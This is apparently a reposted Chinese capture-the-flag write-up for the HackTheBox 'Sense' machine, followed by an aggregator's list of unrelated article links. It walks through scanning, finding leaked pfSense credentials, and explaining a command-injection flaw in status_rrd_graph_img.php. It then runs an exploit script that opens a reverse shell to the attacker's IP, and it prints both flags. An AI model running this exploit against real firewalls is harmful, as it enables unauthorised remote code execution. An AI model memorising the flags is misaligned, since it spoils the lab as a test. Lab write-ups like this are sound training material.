当前位置: 首页 > news >正文

[Meachines] [Easy] Sense PFSense防火墙RCE

news 来源:原创 2024/9/20 6:04:35

信息收集

IP AddressOpening Ports
10.10.10.60TCP:80,443

$ nmap -p- 10.10.10.60 --min-rate 1000 -sC -sV

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
|_http-server-header: lighttpd/1.4.35

HTTPS

https://10.10.10.60/

image.png

$ gobuster dir -u "https://10.10.10.60/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50 -k

$ curl "https://10.10.10.60/system-users.txt" -k

image-2.png

username:rohit password:pfsense

image-1.png

PFSense防火墙-RCE

image-4.png

$ searchsploit -w PFSense 2.1.3

image-5.png

pfSense的status_rrd_graph_img.php页面在处理graph参数时存在命令注入漏洞。尽管对graph参数进行了正则表达式过滤,但管道字符(|)未被移除。通过使用八进制编码,可以绕过非法字符的过滤,注入并执行任意操作系统命令。

$ python3 exp.py --rhost 10.10.10.60 --lhost 10.10.16.14 --lport 10032 --username rohit --password pfsense

image-6.png

User.txt

8721327cc232073b40d27d9c17e7348b

Root.txt

d08c32a5d4f8c8b10e76eb51a69f1a86

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Golang | Leetcode Golang题解之第318题最大单词长度乘积
  • python常用库
  • 【selenium:webdriver原理】
  • 达梦数据库的系统视图v$cachesql
  • C#中计算矩阵(数学库下载和安装)
  • 终极指南:3D 数据科学系统和工具
  • Kotlin简记
  • 卓越运营必备神器:规划复杂项目、使用标准的项目模板,看Minitab Workspace!
  • Adaboost集成学习 | Matlab实现基于ELM-Adaboost极限学习机结合Adaboost集成学习故障诊断
  • javascript:判断输入值是数字还是字母
  • Spring Boot(八十四):集成Thumbnailator来生成缩略图
  • 机器人抓取与操作的挑战与进展——挑战赛角度
  • STM32CubeMX软件使用(超详细)
  • 【从零开始一步步学习VSOA开发】运行hellovsoa
  • 使用 Elastic Observability 中的 OpenTelemetry 进行基础设施监控
  • 【跃迁之路】【669天】程序员高效学习方法论探索系列(实验阶段426-2018.12.13)...
  • angular组件开发
  • flutter的key在widget list的作用以及必要性
  • GraphQL学习过程应该是这样的
  • Invalidate和postInvalidate的区别
  • JS 面试题总结
  • leetcode378. Kth Smallest Element in a Sorted Matrix
  • Linux快速配置 VIM 实现语法高亮 补全 缩进等功能
  • Sass Day-01
  • Unix命令
  • Vim 折腾记
  • vue从创建到完整的饿了么(18)购物车详细信息的展示与删除
  • Xmanager 远程桌面 CentOS 7
  • 从tcpdump抓包看TCP/IP协议
  • 对话:中国为什么有前途/ 写给中国的经济学
  • 个人博客开发系列:评论功能之GitHub账号OAuth授权
  • 来,膜拜下android roadmap,强大的执行力
  • 前端面试之CSS3新特性
  • 双管齐下,VMware的容器新战略
  • 思否第一天
  • 微信开放平台全网发布【失败】的几点排查方法
  • !$boo在php中什么意思,php前戏
  • #我与Java虚拟机的故事#连载03:面试过的百度,滴滴,快手都问了这些问题
  • (STM32笔记)九、RCC时钟树与时钟 第一部分
  • (Windows环境)FFMPEG编译,包含编译x264以及x265
  • (八)c52学习之旅-中断实验
  • (力扣)循环队列的实现与详解(C语言)
  • (六)软件测试分工
  • (十六)一篇文章学会Java的常用API
  • (顺序)容器的好伴侣 --- 容器适配器
  • (转载)虚函数剖析
  • *Django中的Ajax 纯js的书写样式1
  • *p=a是把a的值赋给p,p=a是把a的地址赋给p。
  • *算法训练(leetcode)第四十七天 | 并查集理论基础、107. 寻找存在的路径
  • .Net 6.0 处理跨域的方式
  • .NET DataGridView数据绑定说明
  • .Net Remoting(分离服务程序实现) - Part.3
  • .Net 垃圾回收机制原理(二)
  • .NET/C# 将一个命令行参数字符串转换为命令行参数数组 args
  • .NET3.5下用Lambda简化跨线程访问窗体控件,避免繁复的delegate,Invoke(转)